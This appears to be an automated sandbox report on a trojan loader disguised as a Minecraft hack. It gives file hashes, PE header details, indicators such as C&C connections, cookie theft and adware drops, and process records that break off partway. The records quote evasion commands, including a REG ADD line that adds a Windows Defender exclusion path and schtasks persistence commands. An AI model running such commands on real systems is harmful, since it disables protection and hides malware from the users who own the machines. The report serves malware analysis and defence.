File name:

MINECRAFT_HACK_V2.32.exe

Full analysis: https://app.any.run/tasks/93eb1472-9624-400f-a713-3033d8e0bccc
Verdict: Malicious activity
Threats:

Adware is a form of malware that targets users with unwanted advertisements, often disrupting their browsing experience. It typically infiltrates systems through software bundling, malicious websites, or deceptive downloads. Once installed, it may track user activity, collect sensitive data, and display intrusive ads, including pop-ups or banners. Some advanced adware variants can bypass security measures and establish persistence on devices, making removal challenging. Additionally, adware can create vulnerabilities that other malware can exploit, posing a significant risk to user privacy and system security.

Analysis date: August 24, 2019, 09:36:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
adware
pup
trojan
loader
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, PECompact2 compressed
MD5:

A76DB41385A79B8A75F38AA62142CFB7

SHA1:

8BA03A380657100B38BAB5745A075403538AE32B

SHA256:

7FD65843F1523A5170DB1D0BBD5A2FD7C0641106D80797E01EF407EA5FBDA3AA

SSDEEP:

49152:xcl+6hQNM50dhb5vlyLNDPLATZXMoJUPuZFOqDZuYePC:xcY6h++0dztQbLAeoJUWfOq1uzPC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • wS1paWlpD.exe (PID: 3060)
      • w75638d09e349.exe (PID: 2248)
      • wed8489feea54.exe (PID: 4092)
      • na_runner.exe (PID: 2360)
      • MailRuUpdater.exe (PID: 3964)
      • smappscontroller.exe (PID: 3956)
      • MailRuUpdater.exe (PID: 3808)
      • 4a48-e963-7acb-b809 (PID: 3048)
      • mrupdsrv.exe (PID: 3072)
      • MailRuUpdater.exe (PID: 2916)
      • MailRuUpdater.exe (PID: 2440)
      • MailRuUpdater.exe (PID: 2460)
      • wa92e4e31ddfa.exe (PID: 2280)
      • MailRuUpdater.exe (PID: 2928)
      • MailRuUpdater.exe (PID: 4008)
      • setup.exe (PID: 3080)
      • viewU.exe (PID: 3324)
      • viewU.exe (PID: 2804)
      • view.exe (PID: 948)
      • chromedriver.exe (PID: 4036)
      • chrome.exe (PID: 2548)
      • chrome.exe (PID: 1876)
      • chrome.exe (PID: 3188)
      • chrome.exe (PID: 2316)
      • chrome.exe (PID: 1216)
      • chrome.exe (PID: 3576)
      • chrome.exe (PID: 2620)
      • chrome.exe (PID: 776)
      • Extreme Injector v3.exe (PID: 3840)
      • setup.exe (PID: 1348)
      • RunSI.exe (PID: 560)
      • wcc619dfede3b.exe (PID: 4028)
      • chrome.exe (PID: 2480)
      • infoSiw.exe (PID: 2372)
      • node.exe (PID: 1304)
      • node.exe (PID: 2764)
      • Extreme Injector v3.exe (PID: 4024)
      • Extreme Injector v3.exe (PID: 2596)
      • Extreme Injector v3.exe (PID: 1632)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
      • w5cb7f0c3f70e.exe (PID: 2200)
      • w5cb7f0c3f70e.exe (PID: 3084)
      • w096dac12849a.exe (PID: 2352)
      • python.exe (PID: 3376)
      • python.exe (PID: 3716)
      • python.exe (PID: 1764)
      • python.exe (PID: 3860)
      • python.exe (PID: 2780)
      • ns3646.tmp (PID: 2452)
      • python.exe (PID: 2328)
      • viewU.exe (PID: 2792)
      • view.exe (PID: 3428)
      • chrome.exe (PID: 2676)
      • chromedriver.exe (PID: 3232)
      • chrome.exe (PID: 2580)
      • w39c879301edd.exe (PID: 3836)
      • chrome.exe (PID: 2324)
      • chrome.exe (PID: 2220)
      • chrome.exe (PID: 2260)
      • chrome.exe (PID: 2156)
      • chrome.exe (PID: 3608)
      • chrome.exe (PID: 1648)
      • chrome.exe (PID: 2312)
      • chrome.exe (PID: 1020)
      • chrome.exe (PID: 3404)
      • chrome.exe (PID: 3228)
      • chrome.exe (PID: 4476)
      • chrome.exe (PID: 2872)
      • chrome.exe (PID: 3204)
      • chrome.exe (PID: 3504)
    • Connects to CnC server

      • wS1paWlpD.exe (PID: 3060)
      • w75638d09e349.exe (PID: 2248)
      • MailRuUpdater.exe (PID: 3808)
    • MAILRU was detected

      • w75638d09e349.exe (PID: 2248)
      • MailRuUpdater.exe (PID: 3808)
    • Changes the autorun value in the registry

      • w75638d09e349.exe (PID: 2248)
      • na_runner.exe (PID: 2360)
      • MailRuUpdater.exe (PID: 2460)
      • setup.exe (PID: 3080)
      • python.exe (PID: 3860)
      • python.exe (PID: 1764)
    • Uses Task Scheduler to run other applications

      • wed8489feea54.tmp (PID: 2976)
      • w5cb7f0c3f70e.exe (PID: 2200)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
      • rundll32.exe (PID: 3824)
      • python.exe (PID: 1764)
      • python.exe (PID: 3860)
    • Loads the Task Scheduler COM API

      • na_runner.exe (PID: 2360)
      • schtasks.exe (PID: 3568)
      • schtasks.exe (PID: 2804)
      • schtasks.exe (PID: 3844)
      • MailRuUpdater.exe (PID: 2460)
      • schtasks.exe (PID: 1512)
      • schtasks.exe (PID: 2864)
      • schtasks.exe (PID: 3412)
      • schtasks.exe (PID: 664)
      • schtasks.exe (PID: 3932)
      • schtasks.exe (PID: 2072)
      • schtasks.exe (PID: 2824)
      • schtasks.exe (PID: 3904)
      • schtasks.exe (PID: 2920)
      • schtasks.exe (PID: 3092)
      • schtasks.exe (PID: 1420)
      • schtasks.exe (PID: 392)
      • schtasks.exe (PID: 4072)
      • schtasks.exe (PID: 664)
      • schtasks.exe (PID: 3332)
      • schtasks.exe (PID: 1648)
      • schtasks.exe (PID: 3488)
      • schtasks.exe (PID: 3204)
      • schtasks.exe (PID: 2680)
      • schtasks.exe (PID: 2272)
      • schtasks.exe (PID: 3068)
      • schtasks.exe (PID: 2568)
      • schtasks.exe (PID: 2516)
      • schtasks.exe (PID: 2684)
      • schtasks.exe (PID: 2104)
    • Changes Windows auto-update feature

      • w75638d09e349.exe (PID: 2248)
    • Registers / Runs the DLL via REGSVR32.EXE

      • w75638d09e349.exe (PID: 2248)
    • Disables Windows Defender

      • w75638d09e349.exe (PID: 2248)
    • Loads dropped or rewritten executable

      • regsvr32.exe (PID: 3452)
      • wa92e4e31ddfa.exe (PID: 2280)
      • setup.exe (PID: 3080)
      • viewU.exe (PID: 2804)
      • view.exe (PID: 948)
      • viewU.exe (PID: 3324)
      • chrome.exe (PID: 2548)
      • chrome.exe (PID: 2620)
      • wcc619dfede3b.exe (PID: 4028)
      • chrome.exe (PID: 1876)
      • chrome.exe (PID: 3188)
      • chrome.exe (PID: 3576)
      • chrome.exe (PID: 2316)
      • chrome.exe (PID: 1216)
      • chrome.exe (PID: 2480)
      • chrome.exe (PID: 776)
      • setup.exe (PID: 1348)
      • infoSiw.exe (PID: 2372)
      • RunSI.exe (PID: 560)
      • rundll32.EXE (PID: 4072)
      • rundll32.exe (PID: 3824)
      • python.exe (PID: 2328)
      • python.exe (PID: 3860)
      • python.exe (PID: 1764)
      • python.exe (PID: 3376)
      • w096dac12849a.exe (PID: 2352)
      • python.exe (PID: 3716)
      • python.exe (PID: 2780)
      • view.exe (PID: 3428)
      • viewU.exe (PID: 2792)
      • chrome.exe (PID: 2676)
      • chrome.exe (PID: 2580)
      • chrome.exe (PID: 2156)
      • chrome.exe (PID: 3608)
      • chrome.exe (PID: 2220)
      • chrome.exe (PID: 2324)
      • chrome.exe (PID: 1648)
      • chrome.exe (PID: 2260)
      • chrome.exe (PID: 2312)
      • chrome.exe (PID: 3204)
      • chrome.exe (PID: 1020)
      • chrome.exe (PID: 3404)
      • chrome.exe (PID: 3228)
      • chrome.exe (PID: 4476)
      • chrome.exe (PID: 3504)
      • chrome.exe (PID: 2872)
    • Downloads executable files from the Internet

      • wa92e4e31ddfa.exe (PID: 2280)
      • wcc619dfede3b.exe (PID: 4028)
    • Loads the Task Scheduler DLL interface

      • schtasks.exe (PID: 3164)
      • schtasks.exe (PID: 2564)
      • schtasks.exe (PID: 4088)
    • Modifies exclusions in Windows Defender

      • reg.exe (PID: 3752)
      • reg.exe (PID: 4060)
      • reg.exe (PID: 1520)
      • reg.exe (PID: 2536)
      • reg.exe (PID: 3892)
      • reg.exe (PID: 3456)
      • reg.exe (PID: 3392)
      • reg.exe (PID: 4020)
      • reg.exe (PID: 2948)
      • reg.exe (PID: 3552)
      • reg.exe (PID: 3360)
    • Uses Task Scheduler to autorun other applications

      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
    • Modifies files in Chrome extension folder

      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
      • w39c879301edd.exe (PID: 3836)
    • Changes internet zones settings

      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
    • Changes settings of System certificates

      • python.exe (PID: 3376)
  • SUSPICIOUS

    • Reads Environment values

      • wS1paWlpD.exe (PID: 3060)
      • viewU.exe (PID: 2804)
      • view.exe (PID: 948)
      • infoSiw.exe (PID: 2372)
      • RunSI.exe (PID: 560)
      • viewU.exe (PID: 2792)
      • view.exe (PID: 3428)
    • Executable content was dropped or overwritten

      • MINECRAFT_HACK_V2.32.exe (PID: 3624)
      • w75638d09e349.exe (PID: 2248)
      • wed8489feea54.exe (PID: 4092)
      • wS1paWlpD.exe (PID: 3060)
      • wed8489feea54.tmp (PID: 2976)
      • na_runner.exe (PID: 2360)
      • MailRuUpdater.exe (PID: 3808)
      • 4a48-e963-7acb-b809 (PID: 3048)
      • MailRuUpdater.exe (PID: 3964)
      • MailRuUpdater.exe (PID: 2916)
      • wa92e4e31ddfa.exe (PID: 2280)
      • regsvr32.exe (PID: 3452)
      • MailRuUpdater.exe (PID: 2460)
      • setup.exe (PID: 3080)
      • wcc619dfede3b.exe (PID: 4028)
      • setup.exe (PID: 1348)
      • w5cb7f0c3f70e.exe (PID: 2200)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
      • rundll32.EXE (PID: 4072)
      • w096dac12849a.exe (PID: 2352)
    • Reads CPU info

      • wS1paWlpD.exe (PID: 3060)
    • Creates files in the program directory

      • w75638d09e349.exe (PID: 2248)
      • na_runner.exe (PID: 2360)
      • MailRuUpdater.exe (PID: 3964)
      • 4a48-e963-7acb-b809 (PID: 3048)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
    • Low-level read access rights to disk partition

      • wS1paWlpD.exe (PID: 3060)
    • Reads the cookies of Google Chrome

      • w75638d09e349.exe (PID: 2248)
    • Reads the cookies of Mozilla Firefox

      • w75638d09e349.exe (PID: 2248)
    • Reads the Windows organization settings

      • wed8489feea54.tmp (PID: 2976)
    • Reads Windows owner or organization settings

      • wed8489feea54.tmp (PID: 2976)
    • Creates files in the user directory

      • w75638d09e349.exe (PID: 2248)
      • wed8489feea54.tmp (PID: 2976)
      • MailRuUpdater.exe (PID: 3964)
      • wa92e4e31ddfa.exe (PID: 2280)
      • chromedriver.exe (PID: 4036)
      • wcc619dfede3b.exe (PID: 4028)
      • chrome.exe (PID: 2548)
      • setup.exe (PID: 3080)
      • chrome.exe (PID: 2620)
      • cmd.exe (PID: 2704)
      • infoSiw.exe (PID: 2372)
      • RunSI.exe (PID: 560)
      • cmd.exe (PID: 3128)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
      • python.exe (PID: 3716)
      • python.exe (PID: 3376)
      • python.exe (PID: 2328)
      • w096dac12849a.exe (PID: 2352)
      • chrome.exe (PID: 2580)
      • setup.exe (PID: 1348)
      • chrome.exe (PID: 2676)
    • Uses TASKKILL.EXE to kill process

      • wed8489feea54.tmp (PID: 2976)
    • Searches for installed software

      • wS1paWlpD.exe (PID: 3060)
      • smappscontroller.exe (PID: 3956)
    • Creates a software uninstall entry

      • na_runner.exe (PID: 2360)
      • MailRuUpdater.exe (PID: 2460)
      • setup.exe (PID: 3080)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
      • w096dac12849a.exe (PID: 2352)
    • Starts itself from another location

      • na_runner.exe (PID: 2360)
      • MailRuUpdater.exe (PID: 2460)
      • w5cb7f0c3f70e.exe (PID: 2200)
      • python.exe (PID: 2328)
    • Executed as Windows Service

      • MailRuUpdater.exe (PID: 3808)
      • mrupdsrv.exe (PID: 3072)
      • MailRuUpdater.exe (PID: 2440)
      • MailRuUpdater.exe (PID: 4008)
    • Creates files in the Windows directory

      • MailRuUpdater.exe (PID: 3808)
      • w75638d09e349.exe (PID: 2248)
      • mrupdsrv.exe (PID: 3072)
      • schtasks.exe (PID: 3164)
      • w5cb7f0c3f70e.exe (PID: 3084)
      • cmd.exe (PID: 2272)
      • schtasks.exe (PID: 2564)
      • schtasks.exe (PID: 4088)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
    • Starts application with an unusual extension

      • MailRuUpdater.exe (PID: 3808)
      • w096dac12849a.exe (PID: 2352)
    • Removes files from Windows directory

      • MailRuUpdater.exe (PID: 3808)
      • MailRuUpdater.exe (PID: 2916)
      • MailRuUpdater.exe (PID: 4008)
      • w5cb7f0c3f70e.exe (PID: 3084)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
    • Creates COM task schedule object

      • regsvr32.exe (PID: 3452)
      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
    • Changes the started page of IE

      • w75638d09e349.exe (PID: 2248)
    • Application launched itself

      • chrome.exe (PID: 2620)
      • python.exe (PID: 2328)
      • rundll32.EXE (PID: 4072)
      • python.exe (PID: 2780)
      • chrome.exe (PID: 2676)
    • Starts CMD.EXE for commands execution

      • RunSI.exe (PID: 560)
      • w5cb7f0c3f70e.exe (PID: 3084)
      • view.exe (PID: 948)
    • Executed via Task Scheduler

      • w5cb7f0c3f70e.exe (PID: 3084)
      • rundll32.EXE (PID: 4072)
    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 3880)
      • cmd.exe (PID: 3612)
      • wscript.exe (PID: 3992)
    • Executes scripts

      • w5cb7f0c3f70e.exe (PID: 3084)
    • Reads Internet Cache Settings

      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
    • Changes IE settings (feature browser emulation)

      • kCCZxQhrJpnFHvoi.exe (PID: 2880)
    • Uses RUNDLL32.EXE to load library

      • rundll32.EXE (PID: 4072)
    • Loads Python modules

      • python.exe (PID: 2328)
      • python.exe (PID: 3860)
      • python.exe (PID: 3376)
      • python.exe (PID: 3716)
      • python.exe (PID: 1764)
    • Adds / modifies Windows certificates

      • python.exe (PID: 3376)
  • INFO

    • Creates files in the program directory

      • wed8489feea54.tmp (PID: 2976)
    • Loads dropped or rewritten executable

      • wed8489feea54.tmp (PID: 2976)
    • Application was dropped or rewritten from another process

      • wed8489feea54.tmp (PID: 2976)
    • Creates a software uninstall entry

      • wed8489feea54.tmp (PID: 2976)
    • Reads settings of System Certificates

      • MailRuUpdater.exe (PID: 3964)
      • MailRuUpdater.exe (PID: 2928)
      • MailRuUpdater.exe (PID: 4008)
      • chrome.exe (PID: 2620)
      • python.exe (PID: 3376)
    • Manual execution by user

      • WinRAR.exe (PID: 2332)
      • Extreme Injector v3.exe (PID: 3840)
      • Extreme Injector v3.exe (PID: 1632)
      • Extreme Injector v3.exe (PID: 4024)
      • Extreme Injector v3.exe (PID: 2596)
    • Dropped object may contain Bitcoin addresses

      • setup.exe (PID: 3080)
      • setup.exe (PID: 1348)
      • w096dac12849a.exe (PID: 2352)
      • python.exe (PID: 3716)
    • Application was crashed

      • Extreme Injector v3.exe (PID: 3840)
      • Extreme Injector v3.exe (PID: 1632)
      • Extreme Injector v3.exe (PID: 4024)
      • Extreme Injector v3.exe (PID: 2596)
No Malware configuration.

TRiD

.exe | Win32 EXE PECompact compressed (v2.x) (50.1)
.exe | Win32 EXE PECompact compressed (generic) (35.2)
.dll | Win32 Dynamic Link Library (generic) (5.5)
.exe | Win32 Executable (generic) (3.8)
.exe | Win16/32 Executable Delphi generic (1.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:06:20 13:21:01+02:00
PEType: PE32
LinkerVersion: 2.25
CodeSize: 888320
InitializedDataSize: 1650688
UninitializedDataSize: -
EntryPoint: 0xda7f4
OSVersion: 5
ImageVersion: -
SubsystemVersion: 5
Subsystem: Windows GUI

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 20-Jun-2019 11:21:01

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0050
Pages in file: 0x0002
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x000F
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x001A
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000100

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 2
Time date stamp: 20-Jun-2019 11:21:01
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_BYTES_REVERSED_HI
  • IMAGE_FILE_BYTES_REVERSED_LO
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED

Sections

Section: .text
Virtual Address: 0x00001000
Virtual Size: 0x00278000
Raw Size: 0x0019D600
Characteristics: IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Entropy: 7.99989

Section: .rsrc
Virtual Address: 0x00279000
Virtual Size: 0x0000B000
Raw Size: 0x0000AE00
Characteristics: IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Entropy: 4.33036
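The two section records above are the static evidence behind the "PECompact2 compressed" identification: a near-8.0 entropy code section whose virtual size is well above its raw size, a resource section marked as writable and executable code, and only two sections in total. The following Python is an added example, not part of the ANY.RUN report: it encodes those rows and applies the packer-triage checks an analyst would run on them. The flag constants are the winnt.h values; the entropy and size-ratio thresholds are this example's own assumptions.

```python
"""Packer triage of PE section headers (added example; rows copied from the report)."""
from __future__ import annotations

import math
from collections import Counter

# IMAGE_SECTION_HEADER.Characteristics bits (winnt.h)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
FLAG_NAMES = {
    IMAGE_SCN_CNT_CODE: "IMAGE_SCN_CNT_CODE",
    IMAGE_SCN_MEM_EXECUTE: "IMAGE_SCN_MEM_EXECUTE",
    IMAGE_SCN_MEM_READ: "IMAGE_SCN_MEM_READ",
    IMAGE_SCN_MEM_WRITE: "IMAGE_SCN_MEM_WRITE",
}
RWX_CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# (name, VirtualAddress, VirtualSize, RawSize, Characteristics, entropy) from the Sections table
REPORT_SECTIONS = [
    (".text", 0x00001000, 0x00278000, 0x0019D600, RWX_CODE, 7.99989),
    (".rsrc", 0x00279000, 0x0000B000, 0x0000AE00, RWX_CODE, 4.33036),
]

# Assumed thresholds (this example's choice, not values taken from the report)
ENTROPY_PACKED = 7.2    # bits per byte; compressed/encrypted data approaches 8.0
VSIZE_RAW_RATIO = 1.3   # VirtualSize much larger than RawSize: stub unpacks into the gap


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for constant input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def decode_characteristics(value: int) -> list[str]:
    """Names of the known flags set in a Characteristics value, in winnt.h order."""
    return [name for flag, name in FLAG_NAMES.items() if value & flag]


def triage_section(name, va, vsize, rawsize, chars, entropy) -> list[str]:
    """Findings for a single section header; an empty list means nothing stood out."""
    findings = []
    if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
        findings.append(f"{name}: writable and executable (W^X violated)")
    if name == ".rsrc" and chars & IMAGE_SCN_CNT_CODE:
        findings.append(f"{name}: resource section flagged as code")
    if chars & IMAGE_SCN_CNT_CODE and entropy >= ENTROPY_PACKED:
        findings.append(f"{name}: code entropy {entropy:.2f} suggests packed or encrypted content")
    if rawsize and vsize / rawsize >= VSIZE_RAW_RATIO:
        findings.append(f"{name}: VirtualSize {vsize:#x} far exceeds RawSize {rawsize:#x} (unpacks in place)")
    return findings


def triage_sections(sections) -> list[str]:
    """Run the per-section checks and add the whole-image check on section count."""
    findings = [f for row in sections for f in triage_section(*row)]
    if len(sections) <= 2:
        findings.append(f"only {len(sections)} section(s): typical of a packer stub")
    return findings


if __name__ == "__main__":
    for finding in triage_sections(REPORT_SECTIONS):
        print(finding)
```

On the report's rows this yields six findings: three for .text (RWX, entropy 7.99989, VirtualSize about 1.5 times RawSize), two for .rsrc (RWX, marked as code) and one for the two-section layout. None of these proves malice on its own; they are the reasons an unpacking step comes before any static analysis of the imports listed below.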

Imports

advapi32.dll
kernel32.dll
netapi32.dll
oleaut32.dll
shell32.dll
user32.dll
version.dll

Exports

No data.
All screenshots are available in the full report
Total processes: 256
Monitored processes: 143
Malicious processes: 52
Suspicious processes: 24

Behavior graph

(Interactive graph not reproduced. Its node labels, in launch order, are listed below; "#MAILRU" marks the Mail.Ru detection, "no specs" marks a process with no signature hits, and the edge labels in the graph were "drop and start", "download and start" and "start".)

minecraft_hack_v2.32.exe; ws1pawlpd.exe; w75638d09e349.exe #MAILRU; winrar.exe (no specs); wed8489feea54.exe; wed8489feea54.tmp; taskkill.exe (no specs); na_runner.exe; smappscontroller.exe; schtasks.exe (no specs); mailruupdater.exe #MAILRU; mailruupdater.exe; schtasks.exe (no specs, repeated); 4a48-e963-7acb-b809; mrupdsrv.exe; mailruupdater.exe; notepad.exe (no specs); regsvr32.exe; wa92e4e31ddfa.exe; mailruupdater.exe (repeated); winrar.exe (no specs); setup.exe; viewu.exe (no specs); viewu.exe; view.exe; chromedriver.exe; chrome.exe; chrome.exe (no specs); wcc619dfede3b.exe; chrome.exe (no specs, repeated); extreme injector v3.exe; setup.exe; runsi.exe; cmd.exe (no specs); node.exe (no specs); cmd.exe (no specs); infosiw.exe; node.exe; w5cb7f0c3f70e.exe; schtasks.exe (no specs, repeated); w5cb7f0c3f70e.exe (no specs); gpupdate.exe (no specs); extreme injector v3.exe (repeated); cmd.exe (no specs); reg.exe (no specs); cmd.exe (no specs); reg.exe (no specs); cmd.exe (no specs); wscript.exe (no specs); reg.exe (no specs, repeated); gpupdate.exe (no specs); kcczxqhrjpnfhvoi.exe; schtasks.exe (no specs, repeated); gpupdate.exe (no specs); schtasks.exe (no specs, repeated); rundll32.exe; schtasks.exe (no specs, repeated); rundll32.exe (no specs); schtasks.exe (no specs, repeated); w096dac12849a.exe; ns3646.tmp (no specs); python.exe (repeated, one instance no specs); schtasks.exe (no specs, repeated); w39c879301edd.exe; cmd.exe (no specs); viewu.exe; view.exe; chromedriver.exe; chrome.exe; chrome.exe (no specs, repeated); minecraft_hack_v2.32.exe (no specs)

Process information

Columns: PID, CMD, Path, Indicators, Parent process (the Indicators column was not captured in this extract; each record below also lists process details and the first loaded modules).
PID: 392
CMD: schtasks /DELETE /TN "CRnxQxdxhdYHO2" /F
Path: C:\Windows\system32\schtasks.exe
Parent process: kCCZxQhrJpnFHvoi.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Manages scheduled tasks
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
PID: 560
CMD: C:\Users\admin\AppData\Roaming\infoSiw\RunSI.exe
Path: C:\Users\admin\AppData\Roaming\infoSiw\RunSI.exe
Parent process: setup.exe
User: admin
Integrity Level: HIGH
Description: RunSI
Exit code: 0
Version: 1.0.0.0
Modules (images):
c:\users\admin\appdata\roaming\infosiw\runsi.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID: 664
CMD: schtasks /END /TN "VydEBmIoAbMbnxi"
Path: C:\Windows\system32\schtasks.exe
Parent process: kCCZxQhrJpnFHvoi.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Manages scheduled tasks
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
PID: 664 (PID reused after the previous schtasks instance exited)
CMD: schtasks /run /tn "QIvhlMLYbMJLHRu"
Path: C:\Windows\system32\schtasks.exe
Parent process: kCCZxQhrJpnFHvoi.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Manages scheduled tasks
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\taskschd.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ktmw32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\kernelbase.dll
PID: 776
CMD: "C:\Users\admin\AppData\Roaming\view\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-automation --enable-logging --log-level=0 --test-type=webdriver --field-trial-handle=972,1565396668729221956,3094166035896812107,131072 --disable-gpu-compositing --service-pipe-token=1106422895356507486 --enable-blink-features=ShadowDOMV0 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" --user-data-dir="C:\Users\admin\AppData\Roaming\view\Chrome\NewProfile" --disable-client-side-phishing-detection --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=1106422895356507486 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
Path: C:\Users\admin\AppData\Roaming\view\Chrome\Application\chrome.exe
Parent process: chrome.exe
User: admin
Company: Google Inc.
Integrity Level: HIGH
Description: Google Chrome
Exit code: 0
Version: 73.0.3683.75
Modules (images):
c:\users\admin\appdata\roaming\view\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\users\admin\appdata\roaming\view\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
PID: 848
CMD: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\qZmfXbOWrNBFKIgg" /t REG_DWORD /d 0
Path: C:\Windows\system32\reg.exe
Parent process: cmd.exe
User: SYSTEM
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Registry Console Tool
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\reg.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 948
CMD: C:\Users\admin\AppData\Roaming\view\view.exe dcM8NKNGyH
Path: C:\Users\admin\AppData\Roaming\view\view.exe
Parent process: viewU.exe
User: admin
Company: GoldDay Corp
Integrity Level: HIGH
Description: View
Exit code: 0
Version: 1.0.0.0
Modules (images):
c:\users\admin\appdata\roaming\view\view.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID: 1020
